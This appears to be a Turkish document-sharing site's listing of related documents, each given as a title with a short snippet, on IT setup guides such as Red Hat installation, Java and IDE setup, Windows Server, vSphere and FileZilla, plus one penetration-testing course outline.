Ürün Profil ve Yapılandırma Kodu Tanımlama ESNEK YAPILANDIRMA YENİLİKLERİ Amaç ve Fayda Yayın Tarihi Stoğa ait profil tanımının ve yapılandırma kodlarının tek bir ekrandan tanımlanıp ilişkilendirilebilmesi amacı ile geliştirilmiştir. 22/03/2005

Detaylı

Apache üzerinden Red Hat 5 yüklenmesi

Apache üzerinden Red Hat 5 yüklenmesi Apache üzerinden Red Hat 5 yüklenmesi Erdal YAZICIOGLU Sistem ve Ağ Mühendisi 21.07.2008 MAKALEDE KULLANILAN KISALTMALAR: RHEL = Red Hat Enterprise Linux GUI = Grafical User Interface (Grafiksel Arayüz)

Detaylı

Doğru Adaptor soket kutuplaması.

Doğru Adaptor soket kutuplaması. 1. Tanıtım Next YE-11G WiFi Bridge satın aldığınız için teşekkür ederiz. Bu portatif cihaz ile, IP Kamera ve internet teknolojilerini kullanan Ethernet RJ45 portlu cihazların kablosuz ağlara kolayca erişimi

Detaylı

ADF Transfer Kılavuzu

ADF Transfer Kılavuzu ADF Transfer Kılavuzu Writen By Agony PC'yi AMIGA'ya BAĞLAMAK Amiga emülatörünün çıkmasından bu yana herkesin aklında olan bir konu vardır: İnternette ki.adf uzantılı (ya da.adz.gz.dmz.) dosyaları PC ve

Detaylı

Java JDK (Java Development Kit) Kurulumu:

Java JDK (Java Development Kit) Kurulumu: Java JDK ve Eclipse Kurulumu Öncelikle java ile program geliştirmeye başlamak istiyorsanız iki şeye ihtiyacınız olacak; 1-Java JDK (Java Development Kit) : Java ile yazdığımız kodları derleyip çalıştırmak

Detaylı

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI 1 Başlarken Satın almış olduğunuz TL-WPS510U nun kullanım diagramı aşağıdaki gibidir. Cihazınızı bir ağ yazıcısı değilse veya kablolu ağ yazıcınızı kablosuz olarak

Detaylı

Rezistivite Cihazı Kullanım Klavuzu

Rezistivite Cihazı Kullanım Klavuzu Rezistivite Cihazı Kullanım Klavuzu Açılış ekranı açıklamaları: 1 - Son çalışma aç : Cizhazda en son çalışma yaptığınız dosyayı açar. 2 - Dosya aç : İstediğiniz dosyayı açmanızı sağlar. 3 Yeni çalışma

Detaylı

EFe Event Management System

EFe Event Management System EFe Event Management System Kurulum Dökümanı Efe Event Management System V.0.5 Yazan Açıklama Tarih Aykut Güven EFEM İlk Versiyon 24.01.2018 İÇİNDEKİLER Ön Gereksinimler... 3 Tavsiye edilen konfigürasyon...

Detaylı

İnternet Programcılığı

İnternet Programcılığı 1 PHP le Ver tabanı İşlemler Yaptığımız web sitelerinin daha kullanışlı olması için veritabanı sistemleri ile bağlantı kurup ihtiyaca göre verileri okuyup yazmasını isteriz. 1.1 Veritabanı Nedir? Veritabanı

Detaylı

WINDOWS SERVER 2008 R2-SERVER 2012 DE IP SANALLAŞTIRMA

WINDOWS SERVER 2008 R2-SERVER 2012 DE IP SANALLAŞTIRMA WINDOWS SERVER 2008 R2-SERVER 2012 DE IP SANALLAŞTIRMA IP Sanallaştırma Nedir? Windows Server işletim sistemlerinde Remote Desktop Host Services (önceki ismi Terminal Services) teknolojisini kullanarak

Detaylı

İMAGE (SİSTEM GÖRÜNTÜSÜ) ALMA VE YÜKLEME NASIL YAPILIR. İmage nedir?

İMAGE (SİSTEM GÖRÜNTÜSÜ) ALMA VE YÜKLEME NASIL YAPILIR. İmage nedir? İMAGE (SİSTEM GÖRÜNTÜSÜ) ALMA VE YÜKLEME NASIL YAPILIR İmage nedir? Sistem yüklemelerini en kolay ve en hızlı şekilde yapmak için kullanılan yöntemlerden biridir. Format atılan bir bilgisayara önce işletim

Detaylı

BİOS MENÜSÜNE GİRMEK İÇİN BİLGİSAYARIMIZIN GÜÇ DÜĞMESİNE BASIYORUZ.GENELDE BİLGİSAYARLARDA GÜÇ DÜĞMESİ OLARAK DEL TUŞU KULLANILMAKTADIR.

BİOS MENÜSÜNE GİRMEK İÇİN BİLGİSAYARIMIZIN GÜÇ DÜĞMESİNE BASIYORUZ.GENELDE BİLGİSAYARLARDA GÜÇ DÜĞMESİ OLARAK DEL TUŞU KULLANILMAKTADIR. Kurulumdan önce yapmamız gereken bir kaç adım var. Öncelikle elimizde olması gerekenler: 1- Windows 7 CD si ya da DVD sine ihtiyacımız olacak. 2- İkinci olarak Windows 7 yi kuracağımız bilgisayarın donanımsal

Detaylı

vsphere Client(viClient) ile ESXI Kontrolü

vsphere Client(viClient) ile ESXI Kontrolü vsphere Client(viClient) ile ESXI Kontrolü - ESXI ye Tarayıcıdan Bağlanmak - ESXI ye vsphere Client ile Bağlanmak - ESXI Üzerinde Bir Virtual Machine(Sanal Makine) Oluşturmak ESXI ye Tarayıcıdan Bağlanmak

Detaylı

1. PROGRAM KURMA 1.1 LİNUX PROGRAMLARINI KURMA. 1.1.1 Yazılım Merkezi ile Program Kurma

1. PROGRAM KURMA 1.1 LİNUX PROGRAMLARINI KURMA. 1.1.1 Yazılım Merkezi ile Program Kurma 1. PROGRAM KURMA 1.1 LİNUX PROGRAMLARINI KURMA 1.1.1 Yazılım Merkezi ile Program Kurma Ubuntu işletim sisteminde en kolay program kurma yöntemidir. Birlikte Ubuntu Yazılım Merkezini tanımaya çalışalım.

Detaylı

ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ

ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ E-İMZA KURULUM AŞAMALARI Birimimizden almış olduğunuz e-imzanızı

Detaylı

LOGO SMART NAVIGATOR

LOGO SMART NAVIGATOR LOGO SMART NAVIGATOR LOGO Smart Navigator, yönetim karar destek sisteminin bel kemiğini oluşturan Navigator ürünüyle birlikte çalışmaktadır. Adından da anlaşılacağı üzere navigator kullanımını daha kolaylaştırmakta,

Detaylı

C için tümleşik geliştirme ortamı (IDE) kurulumları

C için tümleşik geliştirme ortamı (IDE) kurulumları C için tümleşik geliştirme ortamı (IDE) kurulumları 1. Code::Blocks IDE 2. Eclipse IDE 3. Dev-C++ IDE 4. Code::Blocks EDU-Portable (CodeBlocks-EP) IDE ( IDE: Integrated Development Environment http://tr.wikipedia.org/wiki/t%c3%bcmle%c5%9fik_geli%c5%9ftirme_ortam%c4%b1

Detaylı

06 - Bilgi Toplama ve Sosyal Mühendislik

06 - Bilgi Toplama ve Sosyal Mühendislik BGM 531 - Sızma Testleri ve Güvenlik Denetlemeleri Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2018 - Güz İçindekiler

Detaylı

FTP Programı File Zilla nın Kurulumu & Çalıştırılması

FTP Programı File Zilla nın Kurulumu & Çalıştırılması FTP Programı File Zilla nın Kurulumu & Çalıştırılması FileZilla Portable programının web den indirilmesi : Google veya benzeri bir arama motoru kullanarak FileZilla FTP programının portatif sürümünü internetten

Detaylı

1/13. Programı kullanmadan önce lütfen indirdiğiniz dosya içerisindeki açıklamaları okuyunuz.

1/13. Programı kullanmadan önce lütfen indirdiğiniz dosya içerisindeki açıklamaları okuyunuz. BFT2006_0.1.4 Programı Linux kullanıcıları için Bayındırlık ve İskan Bakanlığı 2006 yılı birim fiyat adlarını ve poz numaralarını EXCEL vb. herhangi bir elektronik tablolama programı kullanmadan veya sektörel

Detaylı